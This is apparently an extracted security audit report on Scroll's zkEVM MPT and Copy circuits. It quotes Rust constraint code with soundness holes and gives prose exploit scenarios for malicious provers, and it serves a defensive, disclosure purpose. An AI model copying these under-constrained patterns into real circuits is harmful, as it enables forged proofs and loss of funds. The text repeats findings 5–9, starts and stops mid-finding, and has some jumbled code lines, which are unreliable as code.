[ other_key.current(), depth.current() - 1, Figure 4.3: mpt-circuit/src/gadgets/mpt_update.rs#188– Figure 4.4: Part of the MPT specification (spec/mpt-proof.md#L279-L282) Finally, the specification states that when a segment type is a non-trie type, the value of key should be constrained to 0, but this constraint is omitted from the implementation. cb.condition(!is_trie, |cb| { cb.assert_zero("depth is 0 in non-trie segments", depth.current()); }); Figure 4.5: mpt-circuit/src/gadgets/mpt_update.rs#212–214 Figure 4.6: Part of the MPT specification (spec/mpt-proof.md#L284-L286) Recommendations Short term, review the specification and ensure its consistency. Match the implementation with the specification, and document possible optimizations that remove constraints, detailing why they do not cause soundness issues. Long term, include both positive and negative tests for all edge cases in the specification. +5. Redundant lookups in the Word RLC circuit Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-5 Target: src/gadgets/mpt_update/word_rlc.rs Description The Word RLC circuit has two redundant lookups into the BytesLookup table. The Word RLC circuit combines the random linear combination (RLC) for the lower and upper 16 bytes of a word into a single RLC value. For this, it checks that the lower and upper word segments are 16 bytes by looking into the BytesLookup table, and it checks that their RLCs are correctly computed by looking into the RlcLookup table. However, the lookup into the RlcLookup table will also ensure that the lower and upper segments of the word have the correct 16 bytes, making the first two lookups redundant. pub fn configure( cb: &mut ConstraintBuilder, [word_hash, high, low]: [AdviceColumn; 3], [rlc_word, rlc_high, rlc_low]: [SecondPhaseAdviceColumn; 3], poseidon: &impl PoseidonLookup, bytes: &impl BytesLookup, rlc: &impl RlcLookup, randomness: Query, ) { cb.add_lookup( "old_high is 16 bytes", [high.current(), Query::from(15)], bytes.lookup(), ); cb.add_lookup( "old_low is 16 bytes", [low.current(), Query::from(15)], bytes.lookup(), ); cb.poseidon_lookup( "word_hash = poseidon(high, low)", [high.current(), low.current(), word_hash.current()], poseidon, ); cb.add_lookup( "rlc_high = rlc(high) and high is 16 bytes", [high.current(), Query::from(15), rlc_high.current()], rlc.lookup(), ); cb.add_lookup( "rlc_low = rlc(low) and low is 16 bytes", [low.current(), Query::from(15), rlc_low.current()], rlc.lookup(), Figure 5.1: mpt-circuit/src/gadgets/mpt_update/word_rlc.rs#16–49 Although the WordRLC::configure function receives two different lookup objects, bytes and rlc, they are instantiated with the same concrete lookup: let mpt_update = MptUpdateConfig::configure( cs, &mut cb, poseidon, &key_bit, &byte_representation, &byte_representation, &rlc_randomness, &canonical_representation, ); Figure 5.2: mpt-circuit/src/mpt.rs#60–69 We also note that the labels refer to the upper and lower bytes as old_high and old_low instead of just high and low. Recommendations Short term, determine whether both the BytesLookup and RlcLookup tables are needed for this circuit, and refactor the circuit accordingly, removing the redundant constraints. Long term, review the codebase for duplicated or redundant constraints using manual and automated methods. +6. The NonceChanged configuration circuit does not constrain the new value nonce value Severity: High Difficulty: Low Type: Cryptography Finding ID: TOB-SCROLL2-6 Target: src/gadgets/mpt_update.rs Description The NonceChanged configuration circuit does not constrain the config.new_value parameter to be 8 bytes. Instead, there is a duplicated constraint for config.old_value: SegmentType::AccountLeaf3 => { cb.assert_zero("direction is 0", config.direction.current()); let old_code_size = (config.old_hash.current() - config.old_value.current()) * Query::Constant(F::from(1 << 32).square().invert().unwrap()); let new_code_size = (config.new_hash.current() - config.new_value.current()) * Query::Constant(F::from(1 << 32).square().invert().unwrap()); cb.condition( config.path_type.current_matches(&[PathType::Common]), |cb| { cb.add_lookup( "old nonce is 8 bytes", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); cb.add_lookup( "new nonce is 8 bytes", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); Figure 6.1: mpt-circuit/src/gadgets/mpt_update.rs#1209–1228 This means that a malicious prover could update the Account node with a value of arbitrary length for the Nonce and Codesize parameters. The same constraint (with a correct label but incorrect value) is used in the ExtensionNew path type: cb.condition( config.path_type.current_matches(&[PathType::ExtensionNew]), |cb| { cb.add_lookup( "new nonce is 8 bytes", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); Figure 6.2: mpt-circuit/src/gadgets/mpt_update.rs#1241–1248 Exploit Scenario A malicious prover uses the NonceChanged proof to update the nonce with a larger than expected value. Recommendations Short term, enforce the constraint for the config.new_value witness. Long term, add positive and negative testing of the edge cases present in the specification. For both the Common and ExtensionNew path types, there should be a negative test that fails because it changes the new nonce to a value larger than 8 bytes. Use automated testing tools like Semgrep to find redundant and duplicate constraints, as these could indicate that a constraint is incorrect. +7. The Copy circuit does not totally enforce the tag values Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-7 Target: src/copy_circuit/copy_gadgets.rs Description The Copy table includes a tag column that indicates the type of data for that particular row. However, the Copy circuit tag validation function does not totally ensure that the tag matches one of the predefined tag values. The implementation uses the copy_gadgets::constrain_tag function to bind the is_precompiled, is_tx_calldata, is_bytecode, is_memory, and is_tx_log witnesses to the actual tag value. However, the code does not ensure that exactly one of these Boolean values is true. #[allow(clippy::too_many_arguments)] pub fn constrain_tag( meta: &mut ConstraintSystem, q_enable: Column, tag: BinaryNumberConfig, is_precompiled: Column, is_tx_calldata: Column, is_bytecode: Column, is_memory: Column, is_tx_log: Column, ) { meta.create_gate("decode tag", |meta| { let enabled = meta.query_fixed(q_enable, CURRENT); let is_precompile = meta.query_advice(is_precompiled, CURRENT); let is_tx_calldata = meta.query_advice(is_tx_calldata, CURRENT); let is_bytecode = meta.query_advice(is_bytecode, CURRENT); let is_memory = meta.query_advice(is_memory, CURRENT); let is_tx_log = meta.query_advice(is_tx_log, CURRENT); let precompiles = sum::expr([ tag.value_equals( CopyDataType::Precompile(PrecompileCalls::Ecrecover), CURRENT, )(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Sha256), CURRENT)(meta), tag.value_equals( CopyDataType::Precompile(PrecompileCalls::Ripemd160), CURRENT, )(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Identity), CURRENT)(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Modexp), CURRENT)(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Bn128Add), CURRENT)(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Bn128Mul), CURRENT)(meta), tag.value_equals( CopyDataType::Precompile(PrecompileCalls::Bn128Pairing), CURRENT, )(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Blake2F), CURRENT)(meta), ]); vec![ // Match boolean indicators to their respective tag values. enabled.expr() * (is_precompile - precompiles), enabled.expr() * (is_tx_calldata - tag.value_equals(CopyDataType::TxCalldata, CURRENT)(meta)), enabled.expr() CURRENT)(meta)), * (is_bytecode - tag.value_equals(CopyDataType::Bytecode, enabled.expr() * (is_memory - tag.value_equals(CopyDataType::Memory, CURRENT)(meta)), enabled.expr() * (is_tx_log - tag.value_equals(CopyDataType::TxLog, CURRENT)(meta)), ] }); } Figure 7.1: copy_circuit/copy_gadgets.rs#13–62 In fact, the tag value could equal CopyDataType::RlcAcc, as in the SHA3 gadget. The CopyDataType::Padding value is also not currently matched. In the current state of the codebase, this issue does not appear to cause any soundness issues because the lookups into the Copy table either use a statically set source and destination tag or, as in the case of precompiles, the value is correctly bounded and does not pose an avenue of attack for a malicious prover. We also observe that the Copy circuit specification mentions a witness value for the is_rlc_acc case, but this is not reflected in the code. Recommendations Short term, ensure that the tag column is fully constrained. Review the circuit specification and match the implementation with the specification, documenting possible optimizations that remove constraints and detailing why they do not cause soundness issues. Long term, include negative tests for an unintended tag value. +8. The “invalid creation” error handling circuit is unconstrained Severity: High Difficulty: Medium Type: Cryptography Finding ID: TOB-SCROLL2-8 Target: evm_circuit/execution/error_invalid_creation_code.rs Description The “invalid creation” error handling circuit does not constrain the first byte of the actual memory to be 0xef as intended. This allows a malicious prover to redirect the EVM execution to a halt after the CREATE opcode is called, regardless of the memory value. The ErrorInvalidCreationCodeGadget circuit was updated to accommodate the memory addressing optimizations. However, in doing so, the first_byte witness value that was bound to the memory’s first byte is no longer bound to it. Therefore, a malicious prover can always satisfy the circuit constraints, even if they are not in an error state after the CREATE opcode is called. fn configure(cb: &mut EVMConstraintBuilder) -> Self { let opcode = cb.query_cell(); let first_byte = cb.query_cell(); //let address = cb.query_word_rlc(); let offset = cb.query_word_rlc(); let length = cb.query_word_rlc(); let value_left = cb.query_word_rlc(); cb.stack_pop(offset.expr()); cb.stack_pop(length.expr()); cb.require_true("is_create is true", cb.curr.state.is_create.expr()); let address_word = MemoryWordAddress::construct(cb, offset.clone()); // lookup memory for first word cb.memory_lookup( 0.expr(), address_word.addr_left(), value_left.expr(), value_left.expr(), None, ); // let first_byte = value_left.cells[address_word.shift()]; // constrain first byte is 0xef let is_first_byte_invalid = IsEqualGadget::construct(cb, first_byte.expr(), 0xef.expr()); cb.require_true( "is_first_byte_invalid is true", is_first_byte_invalid.expr(), ); Figure 8.1: evm_circuit/execution/error_invalid_creation_code.rs#36–67 Exploit Scenario A malicious prover generates two different proofs for the same transaction, one leading to the error state, and the other successfully executing the CREATE opcode. Distributing these proofs to two ends of a bridge leads to state divergence and a loss of funds. Recommendations Short term, bind the first_byte witness value to the memory value; ensure that the successful CREATE end state checks that the first byte is different from 0xef. Long term, investigate ways to generate malicious traces that could be added to the test suite; every time a new soundness issue is found, create such a malicious trace and add it to the test suite. +9. The OneHot primitive allows more than one value at once Severity: High Difficulty: Low Type: Cryptography Finding ID: TOB-SCROLL2-9 Target: constraint_builder/binary_column.rs Description The OneHot primitive uses BinaryQuery values as witness values. However, despite their name, these values are not constrained to be Boolean values, allowing a malicious prover to choose more than one “hot” value in the data structure. impl OneHot { pub fn configure( cs: &mut ConstraintSystem, cb: &mut ConstraintBuilder, ) -> Self { let mut columns = HashMap::new(); for variant in Self::nonfirst_variants() { columns.insert(variant, cb.binary_columns::<1>(cs)[0]); } let config = Self { columns }; cb.assert( "sum of binary columns in OneHot is 0 or 1", config.sum(0).or(!config.sum(0)), ); config } Figure 9.1: mpt-circuit/src/gadgets/one_hot.rs#14–30 The reason the BinaryQuery values are not constrained to be Boolean is because the BinaryColumn configuration does not constrain the advice values to be Boolean, and the configuration is simply a type wrapper around the Column type. This provides no guarantees to the users of this API, who might assume that these values are guaranteed to be Boolean. pub fn configure( cs: &mut ConstraintSystem, _cb: &mut ConstraintBuilder, ) -> Self { let advice_column = cs.advice_column(); // TODO: constrain to be binary here... // cb.add_constraint() Self(advice_column) } Figure 9.2: mpt-circuit/src/constraint_builder/binary_column.rs#29–37 The OneHot primitive is used to implement the Merkle path–checking state machine, including critical properties such as requiring the key and other_key columns to remain unchanged along a given Merkle path calculation, as shown in figure 9.3. cb.condition( !segment_type.current_matches(&[SegmentType::Start, SegmentType::AccountLeaf3]), |cb| { cb.assert_equal( "key can only change on Start or AccountLeaf3 rows", key.current(), key.previous(), ); cb.assert_equal( "other_key can only change on Start or AccountLeaf3 rows", other_key.current(), other_key.previous(), ); }, ); Figure 9.3: mpt-circuit/src/gadgets/mpt_update.rs#170–184 We did not develop a proof-of-concept exploit for the path-checking table, so it may be the case that the constraint in figure 9.3 is not exploitable due to other constraints. However, if at any point it is possible to match both SegmentType::Start and some other segment type (such as by setting one OneHot cell to 1 and another to -1), a malicious prover would be able to change the key partway through and forge Merkle updates. Exploit Scenario A malicious prover uses the OneHot soundness issue to bypass constraints, ensuring that the key and other_key columns remain unchanged along a given Merkle path calculation. This allows the attacker to successfully forge MPT update proofs that update an arbitrary key. Recommendations Short term, add constraints that ensure that the advice values from these columns are Boolean. Long term, add positive and negative tests ensuring that these constraint builders operate according to their expectations. +1. PoseidonLookup is not implemented Severity: Informational Difficulty: N/A Type: Testing Finding ID: TOB-SCROLL2-1 Target: src/gadgets/poseidon.rs Description Poseidon hashing is performed within the MPT circuit by performing lookups into a Poseidon table via the PoseidonLookup trait, shown in figure 1.1. /// Lookup represent the poseidon table in zkevm circuit pub trait PoseidonLookup { fn lookup_columns(&self) -> (FixedColumn, [AdviceColumn; 5]) { let (fixed, adv) = self.lookup_columns_generic(); (FixedColumn(fixed), adv.map(AdviceColumn)) } fn lookup_columns_generic(&self) -> (Column, [Column; 5]) { let (fixed, adv) = self.lookup_columns(); (fixed.0, adv.map(|col| col.0)) } } Figure 1.1: src/gadgets/poseidon.rs#11–21 This trait is not implemented by any types except the testing-only PoseidonTable shown in figure 1.2, which does not constrain its columns at all. #[cfg(test)] #[derive(Clone, Copy)] pub struct PoseidonTable { q_enable: FixedColumn, left: AdviceColumn, right: AdviceColumn, hash: AdviceColumn, control: AdviceColumn, head_mark: AdviceColumn, } #[cfg(test)] impl PoseidonTable { pub fn configure(cs: &mut ConstraintSystem) -> Self { let [hash, left, right, control, head_mark] = [0; 5].map(|_| AdviceColumn(cs.advice_column())); Self { left, right, hash, control, head_mark, q_enable: FixedColumn(cs.fixed_column()), } } Figure 1.2: src/gadgets/poseidon.rs#56–80 The rest of the codebase treats this trait as a black-box implementation, so this does not seem to cause correctness problems elsewhere. However, it does limit one’s ability to test some negative cases, and it makes the test coverage rely on the correctness of the PoseidonTable struct’s witness generation. Recommendations Short term, create a concrete implementation of the PoseidonLookup trait to enable full testing of the MPT circuit. Long term, ensure that all parts of the MPT circuit are tested with both positive and negative tests. +2. IsZeroGadget does not constrain the inverse witness when the value is zero Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-2 Target: src/gadgets/is_zero.rs Description The IsZeroGadget implementation allows for an arbitrary inverse_or_zero witness value when the value parameter is 0. The gadget returns 1 when value is 0; otherwise, it returns 0. The implementation relies on the existence of an inverse for when value is nonzero and on correctly constraining that value * (1 - value * inverse_or_zero) == 0. However, when value is 0, the constraint is immediately satisfied, regardless of the value of the inverse_or_zero witness. This allows an arbitrary value to be provided for that witness value. pub fn configure( cs: &mut ConstraintSystem, cb: &mut ConstraintBuilder, value: AdviceColumn, // TODO: make this a query once Query is clonable/copyable..... ) -> Self { let inverse_or_zero = AdviceColumn(cs.advice_column()); cb.assert_zero( "value is 0 or inverse_or_zero is inverse of value", value.current() * (Query::one() - value.current() * inverse_or_zero.current()), ); Self { value, inverse_or_zero, } } Figure 2.1: mpt-circuit/src/gadgets/is_zero.rs#48–62 Recommendations Short term, ensure that the circuit is deterministic by constraining inverse_or_zero to equal 0 when value is 0. Long term, document which circuits have nondeterministic witnesses; over time, constrain them so that all circuits have deterministic witnesses. +3. The MPT nonexistence proof gadget is missing constraints specified in the documentation Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-3 Target: src/gadgets/mpt_update/nonexistence_proof.rs Description The gadget for checking the consistency of nonexistence proofs is missing several constraints related to type 2 nonexistence proofs. The circuit specification includes constraints for the nonexistence of path proofs that are not included in the implementation. This causes the witness values to be unconstrained in some cases. For example, the following constraints are specified: ● other_key_hash should equal 0 when key does not equal other_key. ● other_leaf_data_hash should equal the hash of the empty node (pointer by other_key). Neither of these constraints is enforced in the implementation: this is because the implementation has no explicit constraints imposed for the type 2 nonexistence proofs. Figure 3.1 shows that the circuit constrains these values only for type 1 proofs. pub fn configure( cb: &mut ConstraintBuilder, value: SecondPhaseAdviceColumn, key: AdviceColumn, other_key: AdviceColumn, key_equals_other_key: IsZeroGadget, hash: AdviceColumn, hash_is_zero: IsZeroGadget, other_key_hash: AdviceColumn, other_leaf_data_hash: AdviceColumn, poseidon: &impl PoseidonLookup, ) { cb.assert_zero("value is 0 for empty node", value.current()); cb.assert_equal( "key_minus_other_key = key - other key", key_equals_other_key.value.current(), key.current() - other_key.current(), ); cb.assert_equal( "hash_is_zero input == hash", hash_is_zero.value.current(), hash.current(), ); let is_type_1 = !key_equals_other_key.current(); let is_type_2 = hash_is_zero.current(); cb.assert_equal( "Empty account is either type 1 xor type 2", Query::one(), Query::from(is_type_1.clone()) + Query::from(is_type_2), ); cb.condition(is_type_1, |cb| { cb.poseidon_lookup( "other_key_hash == h(1, other_key)", [Query::one(), other_key.current(), other_key_hash.current()], poseidon, ); cb.poseidon_lookup( "hash == h(key_hash, other_leaf_data_hash)", [ other_key_hash.current(), other_leaf_data_hash.current(), hash.current(), ], poseidon, ); }); Figure 3.1: mpt-circuit/src/gadgets/mpt_update/nonexistence_proof.rs#7–54 The Scroll team has stated that this is a specification error and that the missing constraints do not impact the soundness of the circuit. Recommendations Short term, update the specification to remove the description of these constraints; ensure that the documentation is kept updated. Long term, add positive and negative tests for both types of nonexistence proofs. +4. Discrepancies between the MPT circuit specification and implementation Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-4 Target: Several files Description The MPT circuit implementation is not faithful to the circuit specification in many areas and does not contain comments for the constraints that are either missing from the implementation or that diverge from those in the specification. The allowed segment transitions depend on the proof type. For the NonceChanged proof type, the specification states that the Start segment type can transition to Start and that the AccountLeaf0 segment type also can transition to Start. However, neither of these paths is allowed in the implementation. MPTProofType::NonceChanged | MPTProofType::BalanceChanged | MPTProofType::CodeSizeExists | MPTProofType::CodeHashExists => [ SegmentType::Start, vec![ SegmentType::AccountTrie, // mpt has > 1 account SegmentType::AccountLeaf0, // mpt has <= 1 account ], ( ), ( SegmentType::AccountTrie, vec![ SegmentType::AccountTrie, SegmentType::AccountLeaf0, SegmentType::Start, // empty account proof ], ), (SegmentType::AccountLeaf0, vec![SegmentType::AccountLeaf1]), (SegmentType::AccountLeaf1, vec![SegmentType::AccountLeaf2]), (SegmentType::AccountLeaf2, vec![SegmentType::AccountLeaf3]), (SegmentType::AccountLeaf3, vec![SegmentType::Start]), Figure 4.1: mpt-circuit/src/gadgets/mpt_update/segment.rs#20– Figure 4.2: Part of the MPT specification (spec/mpt-proof.md#L318-L328) The transitions allowed for the PoseidonCodeHashExists proof type also do not match: the specification states that it has the same transitions as the NonceChanged proof type, but the implementation has different transitions. The key depth direction checks also do not match the specification. The specification states that the depth parameter should be used but the implementation uses depth - 1. cb.condition(is_trie.clone(), |cb| { cb.add_lookup( "direction is correct for key and depth", [key.current(), depth.current() - 1, direction.current()], key_bit.lookup(), ); cb.assert_equal( "depth increases by 1 in trie segments", depth.current(), depth.previous() + 1, ); cb.condition(path_type.current_matches(&[PathType::Common]), |cb| { cb.add_lookup( "direction is correct for other_key and depth", [ other_key.current(), depth.current() - 1, Figure 4.3: mpt-circuit/src/gadgets/mpt_update.rs#188– Figure 4.4: Part of the MPT specification (spec/mpt-proof.md#L279-L282) Finally, the specification states that when a segment type is a non-trie type, the value of key should be constrained to 0, but this constraint is omitted from the implementation. cb.condition(!is_trie, |cb| { cb.assert_zero("depth is 0 in non-trie segments", depth.current()); }); Figure 4.5: mpt-circuit/src/gadgets/mpt_update.rs#212–214 Figure 4.6: Part of the MPT specification (spec/mpt-proof.md#L284-L286) Recommendations Short term, review the specification and ensure its consistency. Match the implementation with the specification, and document possible optimizations that remove constraints, detailing why they do not cause soundness issues. Long term, include both positive and negative tests for all edge cases in the specification. +5. Redundant lookups in the Word RLC circuit Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-5 Target: src/gadgets/mpt_update/word_rlc.rs Description The Word RLC circuit has two redundant lookups into the BytesLookup table. The Word RLC circuit combines the random linear combination (RLC) for the lower and upper 16 bytes of a word into a single RLC value. For this, it checks that the lower and upper word segments are 16 bytes by looking into the BytesLookup table, and it checks that their RLCs are correctly computed by looking into the RlcLookup table. However, the lookup into the RlcLookup table will also ensure that the lower and upper segments of the word have the correct 16 bytes, making the first two lookups redundant. pub fn configure( cb: &mut ConstraintBuilder, [word_hash, high, low]: [AdviceColumn; 3], [rlc_word, rlc_high, rlc_low]: [SecondPhaseAdviceColumn; 3], poseidon: &impl PoseidonLookup, bytes: &impl BytesLookup, rlc: &impl RlcLookup, randomness: Query, ) { cb.add_lookup( "old_high is 16 bytes", [high.current(), Query::from(15)], bytes.lookup(), ); cb.add_lookup( "old_low is 16 bytes", [low.current(), Query::from(15)], bytes.lookup(), ); cb.poseidon_lookup( "word_hash = poseidon(high, low)", [high.current(), low.current(), word_hash.current()], poseidon, ); cb.add_lookup( "rlc_high = rlc(high) and high is 16 bytes", [high.current(), Query::from(15), rlc_high.current()], rlc.lookup(), ); cb.add_lookup( "rlc_low = rlc(low) and low is 16 bytes", [low.current(), Query::from(15), rlc_low.current()], rlc.lookup(), Figure 5.1: mpt-circuit/src/gadgets/mpt_update/word_rlc.rs#16–49 Although the WordRLC::configure function receives two different lookup objects, bytes and rlc, they are instantiated with the same concrete lookup: let mpt_update = MptUpdateConfig::configure( cs, &mut cb, poseidon, &key_bit, &byte_representation, &byte_representation, &rlc_randomness, &canonical_representation, ); Figure 5.2: mpt-circuit/src/mpt.rs#60–69 We also note that the labels refer to the upper and lower bytes as old_high and old_low instead of just high and low. Recommendations Short term, determine whether both the BytesLookup and RlcLookup tables are needed for this circuit, and refactor the circuit accordingly, removing the redundant constraints. Long term, review the codebase for duplicated or redundant constraints using manual and automated methods. +6. The NonceChanged configuration circuit does not constrain the new value nonce value Severity: High Difficulty: Low Type: Cryptography Finding ID: TOB-SCROLL2-6 Target: src/gadgets/mpt_update.rs Description The NonceChanged configuration circuit does not constrain the config.new_value parameter to be 8 bytes. Instead, there is a duplicated constraint for config.old_value: SegmentType::AccountLeaf3 => { cb.assert_zero("direction is 0", config.direction.current()); let old_code_size = (config.old_hash.current() - config.old_value.current()) * Query::Constant(F::from(1 << 32).square().invert().unwrap()); let new_code_size = (config.new_hash.current() - config.new_value.current()) * Query::Constant(F::from(1 << 32).square().invert().unwrap()); cb.condition( config.path_type.current_matches(&[PathType::Common]), |cb| { cb.add_lookup( "old nonce is 8 bytes", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); cb.add_lookup( "new nonce is 8 bytes", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); Figure 6.1: mpt-circuit/src/gadgets/mpt_update.rs#1209–1228 This means that a malicious prover could update the Account node with a value of arbitrary length for the Nonce and Codesize parameters. The same constraint (with a correct label but incorrect value) is used in the ExtensionNew path type: cb.condition( config.path_type.current_matches(&[PathType::ExtensionNew]), |cb| { cb.add_lookup( "new nonce is 8 bytes", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); Figure 6.2: mpt-circuit/src/gadgets/mpt_update.rs#1241–1248 Exploit Scenario A malicious prover uses the NonceChanged proof to update the nonce with a larger than expected value. Recommendations Short term, enforce the constraint for the config.new_value witness. Long term, add positive and negative testing of the edge cases present in the specification. For both the Common and ExtensionNew path types, there should be a negative test that fails because it changes the new nonce to a value larger than 8 bytes. Use automated testing tools like Semgrep to find redundant and duplicate constraints, as these could indicate that a constraint is incorrect. +7. The Copy circuit does not totally enforce the tag values Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-7 Target: src/copy_circuit/copy_gadgets.rs Description The Copy table includes a tag column that indicates the type of data for that particular row. However, the Copy circuit tag validation function does not totally ensure that the tag matches one of the predefined tag values. The implementation uses the copy_gadgets::constrain_tag function to bind the is_precompiled, is_tx_calldata, is_bytecode, is_memory, and is_tx_log witnesses to the actual tag value. However, the code does not ensure that exactly one of these Boolean values is true. #[allow(clippy::too_many_arguments)] pub fn constrain_tag( meta: &mut ConstraintSystem, q_enable: Column, tag: BinaryNumberConfig, is_precompiled: Column, is_tx_calldata: Column, is_bytecode: Column, is_memory: Column, is_tx_log: Column, ) { meta.create_gate("decode tag", |meta| { let enabled = meta.query_fixed(q_enable, CURRENT); let is_precompile = meta.query_advice(is_precompiled, CURRENT); let is_tx_calldata = meta.query_advice(is_tx_calldata, CURRENT); let is_bytecode = meta.query_advice(is_bytecode, CURRENT); let is_memory = meta.query_advice(is_memory, CURRENT); let is_tx_log = meta.query_advice(is_tx_log, CURRENT); let precompiles = sum::expr([ tag.value_equals( CopyDataType::Precompile(PrecompileCalls::Ecrecover), CURRENT, )(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Sha256), CURRENT)(meta), tag.value_equals( CopyDataType::Precompile(PrecompileCalls::Ripemd160), CURRENT, )(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Identity), CURRENT)(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Modexp), CURRENT)(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Bn128Add), CURRENT)(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Bn128Mul), CURRENT)(meta), tag.value_equals( CopyDataType::Precompile(PrecompileCalls::Bn128Pairing), CURRENT, )(meta), tag.value_equals(CopyDataType::Precompile(PrecompileCalls::Blake2F), CURRENT)(meta), ]); vec![ // Match boolean indicators to their respective tag values. enabled.expr() * (is_precompile - precompiles), enabled.expr() * (is_tx_calldata - tag.value_equals(CopyDataType::TxCalldata, CURRENT)(meta)), enabled.expr() CURRENT)(meta)), * (is_bytecode - tag.value_equals(CopyDataType::Bytecode, enabled.expr() * (is_memory - tag.value_equals(CopyDataType::Memory, CURRENT)(meta)), enabled.expr() * (is_tx_log - tag.value_equals(CopyDataType::TxLog, CURRENT)(meta)), ] }); } Figure 7.1: copy_circuit/copy_gadgets.rs#13–62 In fact, the tag value could equal CopyDataType::RlcAcc, as in the SHA3 gadget. The CopyDataType::Padding value is also not currently matched. In the current state of the codebase, this issue does not appear to cause any soundness issues because the lookups into the Copy table either use a statically set source and destination tag or, as in the case of precompiles, the value is correctly bounded and does not pose an avenue of attack for a malicious prover. We also observe that the Copy circuit specification mentions a witness value for the is_rlc_acc case, but this is not reflected in the code. Recommendations Short term, ensure that the tag column is fully constrained. Review the circuit specification and match the implementation with the specification, documenting possible optimizations that remove constraints and detailing why they do not cause soundness issues. Long term, include negative tests for an unintended tag value. +8. The “invalid creation” error handling circuit is unconstrained Severity: High Difficulty: Medium Type: Cryptography Finding ID: TOB-SCROLL2-8 Target: evm_circuit/execution/error_invalid_creation_code.rs Description The “invalid creation” error handling circuit does not constrain the first byte of the actual memory to be 0xef as intended. This allows a malicious prover to redirect the EVM execution to a halt after the CREATE opcode is called, regardless of the memory value. The ErrorInvalidCreationCodeGadget circuit was updated to accommodate the memory addressing optimizations. However, in doing so, the first_byte witness value that was bound to the memory’s first byte is no longer bound to it. Therefore, a malicious prover can always satisfy the circuit constraints, even if they are not in an error state after the CREATE opcode is called. fn configure(cb: &mut EVMConstraintBuilder) -> Self { let opcode = cb.query_cell(); let first_byte = cb.query_cell(); //let address = cb.query_word_rlc(); let offset = cb.query_word_rlc(); let length = cb.query_word_rlc(); let value_left = cb.query_word_rlc(); cb.stack_pop(offset.expr()); cb.stack_pop(length.expr()); cb.require_true("is_create is true", cb.curr.state.is_create.expr()); let address_word = MemoryWordAddress::construct(cb, offset.clone()); // lookup memory for first word cb.memory_lookup( 0.expr(), address_word.addr_left(), value_left.expr(), value_left.expr(), None, ); // let first_byte = value_left.cells[address_word.shift()]; // constrain first byte is 0xef let is_first_byte_invalid = IsEqualGadget::construct(cb, first_byte.expr(), 0xef.expr()); cb.require_true( "is_first_byte_invalid is true", is_first_byte_invalid.expr(), ); Figure 8.1: evm_circuit/execution/error_invalid_creation_code.rs#36–67 Exploit Scenario A malicious prover generates two different proofs for the same transaction, one leading to the error state, and the other successfully executing the CREATE opcode. Distributing these proofs to two ends of a bridge leads to state divergence and a loss of funds. Recommendations Short term, bind the first_byte witness value to the memory value; ensure that the successful CREATE end state checks that the first byte is different from 0xef. Long term, investigate ways to generate malicious traces that could be added to the test suite; every time a new soundness issue is found, create such a malicious trace and add it to the test suite. +9. The OneHot primitive allows more than one value at once Severity: High Difficulty: Low Type: Cryptography Finding ID: TOB-SCROLL2-9 Target: constraint_builder/binary_column.rs Description The OneHot primitive uses BinaryQuery values as witness values. However, despite their name, these values are not constrained to be Boolean values, allowing a malicious prover to choose more than one “hot” value in the data structure. impl OneHot { pub fn configure( cs: &mut ConstraintSystem, cb: &mut ConstraintBuilder, ) -> Self { let mut columns = HashMap::new(); for variant in Self::nonfirst_variants() { columns.insert(variant, cb.binary_columns::<1>(cs)[0]); } let config = Self { columns }; cb.assert( "sum of binary columns in OneHot is 0 or 1", config.sum(0).or(!config.sum(0)), ); config } Figure 9.1: mpt-circuit/src/gadgets/one_hot.rs#14–30 The reason the BinaryQuery values are not constrained to be Boolean is because the BinaryColumn configuration does not constrain the advice values to be Boolean, and the configuration is simply a type wrapper around the Column type. This provides no guarantees to the users of this API, who might assume that these values are guaranteed to be Boolean. pub fn configure( cs: &mut ConstraintSystem, _cb: &mut ConstraintBuilder, ) -> Self { let advice_column = cs.advice_column(); // TODO: constrain to be binary here... // cb.add_constraint() Self(advice_column) } Figure 9.2: mpt-circuit/src/constraint_builder/binary_column.rs#29–37 The OneHot primitive is used to implement the Merkle path–checking state machine, including critical properties such as requiring the key and other_key columns to remain unchanged along a given Merkle path calculation, as shown in figure 9.3. cb.condition( !segment_type.current_matches(&[SegmentType::Start, SegmentType::AccountLeaf3]), |cb| { cb.assert_equal( "key can only change on Start or AccountLeaf3 rows", key.current(), key.previous(), ); cb.assert_equal( "other_key can only change on Start or AccountLeaf3 rows", other_key.current(), other_key.previous(), ); }, ); Figure 9.3: mpt-circuit/src/gadgets/mpt_update.rs#170–184 We did not develop a proof-of-concept exploit for the path-checking table, so it may be the case that the constraint in figure 9.3 is not exploitable due to other constraints. However, if at any point it is possible to match both SegmentType::Start and some other segment type (such as by setting one OneHot cell to 1 and another to -1), a malicious prover would be able to change the key partway through and forge Merkle updates. Exploit Scenario A malicious prover uses the OneHot soundness issue to bypass constraints, ensuring that the key and other_key columns remain unchanged along a given Merkle path calculation. This allows the attacker to successfully forge MPT update proofs that update an arbitrary key. Recommendations Short term, add constraints that ensure that the advice values from these columns are Boolean. Long term, add positive and negative tests ensuring that these constraint builders operate according to their expectations. +10. Intermediate columns are not explicit Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-10 Target: src/mpt_update.rs Description The MPT update circuit includes two arrays 